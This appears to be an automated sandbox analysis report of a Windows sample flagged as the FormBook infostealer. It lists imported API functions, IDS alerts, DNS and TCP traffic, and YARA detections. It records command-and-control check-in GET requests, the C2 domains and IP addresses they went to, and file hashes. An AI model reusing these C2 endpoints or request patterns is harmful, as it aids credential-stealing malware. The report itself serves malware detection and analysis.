                                                                                                                                                                                                                                                    RT_STRING0x12e71c0x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                                                                                                                    RT_STRING0x12eda80x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                                                                                                                    RT_STRING0x12f2380x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                                                                    RT_STRING0x12f8340x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                                                                    RT_STRING0x12fe900x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                                                                                                                    RT_STRING0x1302f80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                                                                                                    RT_RCDATA0x1304500x34442data1.0003550041572855
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x1648940x84dataEnglishGreat Britain0.7196969696969697
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x1649180x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x16492c0x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x1649400x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                    RT_VERSION0x1649540xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                                                                                                    RT_MANIFEST0x164a300x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                                                    COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                                                                                                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                                                                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                                                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                                                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                                                                                                                    USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                                                                                                                                                    KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                                                                                                                                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                                                                                                                                                    GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                                                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                    ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                                                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                                                                                                                                                    OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                    EnglishGreat Britain
                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-12-23T13:58:16.204199+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44977245.38.60.4780TCP
                                                                                                                                                                                                                                                    2024-12-23T13:58:16.204199+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44977245.38.60.4780TCP
                                                                                                                                                                                                                                                    2024-12-23T13:58:16.204199+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44977245.38.60.4780TCP
                                                                                                                                                                                                                                                    2024-12-23T13:58:37.356933+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449819198.252.111.4980TCP
                                                                                                                                                                                                                                                    2024-12-23T13:58:37.356933+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449819198.252.111.4980TCP
                                                                                                                                                                                                                                                    2024-12-23T13:58:37.356933+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449819198.252.111.4980TCP
                                                                                                                                                                                                                                                    2024-12-23T13:59:00.358258+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449885104.21.40.19680TCP
                                                                                                                                                                                                                                                    2024-12-23T13:59:00.358258+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449885104.21.40.19680TCP
                                                                                                                                                                                                                                                    2024-12-23T13:59:00.358258+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449885104.21.40.19680TCP
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.112931013 CET4977280192.168.2.445.38.60.47
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.232954979 CET804977245.38.60.47192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.235979080 CET4977280192.168.2.445.38.60.47
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.235980034 CET4977280192.168.2.445.38.60.47
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.355819941 CET804977245.38.60.47192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.745877028 CET4977280192.168.2.445.38.60.47
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.907917023 CET804977245.38.60.47192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:16.204147100 CET804977245.38.60.47192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:16.204199076 CET4977280192.168.2.445.38.60.47
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.279192924 CET4981980192.168.2.4198.252.111.49
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.398832083 CET8049819198.252.111.49192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.398897886 CET4981980192.168.2.4198.252.111.49
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.401154041 CET4981980192.168.2.4198.252.111.49
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.520661116 CET8049819198.252.111.49192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.901844978 CET4981980192.168.2.4198.252.111.49
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:37.064100027 CET8049819198.252.111.49192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:37.356832981 CET8049819198.252.111.49192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:37.356933117 CET4981980192.168.2.4198.252.111.49
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.345669031 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.465219021 CET8049885104.21.40.196192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.466597080 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.466643095 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.586256981 CET8049885104.21.40.196192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.980006933 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    Dec 23, 2024 13:59:00.143965960 CET8049885104.21.40.196192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:59:00.357793093 CET8049885104.21.40.196192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:59:00.358258009 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 23, 2024 13:57:34.434173107 CET5363653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 23, 2024 13:57:34.986418962 CET53536361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:57:54.730197906 CET5765453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 23, 2024 13:57:54.948425055 CET53576541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:14.589582920 CET6272453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.112318039 CET53627241.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:35.663893938 CET5200353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.277868032 CET53520031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:45.971921921 CET4938553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:58.943607092 CET5104553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.344844103 CET53510451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 23, 2024 13:57:34.434173107 CET192.168.2.41.1.1.10x997aStandard query (0)www.imxtld.clubA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:57:54.730197906 CET192.168.2.41.1.1.10xad2dStandard query (0)www.ux-design-courses-53497.bondA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:14.589582920 CET192.168.2.41.1.1.10x4a6fStandard query (0)www.vytech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:35.663893938 CET192.168.2.41.1.1.10xaf15Standard query (0)www.lebahsemesta57.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:45.971921921 CET192.168.2.41.1.1.10x96f6Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:58.943607092 CET192.168.2.41.1.1.10xa843Standard query (0)www.7b5846.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 23, 2024 13:57:54.948425055 CET1.1.1.1192.168.2.40xad2dName error (3)www.ux-design-courses-53497.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.112318039 CET1.1.1.1192.168.2.40x4a6fNo error (0)www.vytech.net45.38.60.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.277868032 CET1.1.1.1192.168.2.40xaf15No error (0)www.lebahsemesta57.clicklebahsemesta57.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.277868032 CET1.1.1.1192.168.2.40xaf15No error (0)lebahsemesta57.click198.252.111.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:46.109687090 CET1.1.1.1192.168.2.40x96f6No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.344844103 CET1.1.1.1192.168.2.40xa843No error (0)www.7b5846.online104.21.40.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.344844103 CET1.1.1.1192.168.2.40xa843No error (0)www.7b5846.online172.67.188.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    • www.vytech.net
                                                                                                                                                                                                                                                    • www.lebahsemesta57.click
                                                                                                                                                                                                                                                    • www.7b5846.online
                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.44977245.38.60.47802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:15.235980034 CET167OUTGET /hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZn HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.vytech.net
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.449819198.252.111.49802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:36.401154041 CET177OUTGET /hwu6/?NvW8gh=ODu4ekR727XBQcKUwHIo8nVNut1O1Z6HvIEUsjxvVtHRsmxVrOVq8qUINChS6+VnMtr8&1bd=qBZpwRT8rpbTOZn HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.lebahsemesta57.click
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.449885104.21.40.196803052C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.466643095 CET167OUTGET /hwu6/?adoHn6=uXc87hFXpvg4&Rl7=YeF1y3FAQJcqH3tuWfJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd1rezRCsTdps HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.7b5846.online
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:07:56:56
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                    Imagebase:0xec0000
                                                                                                                                                                                                                                                    File size:1'482'240 bytes
                                                                                                                                                                                                                                                    MD5 hash:B96E6785937BD52B1281FB98F0ABCF25
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                    Start time:07:56:57
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                                                    File size:46'504 bytes
                                                                                                                                                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                    Start time:07:56:57
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
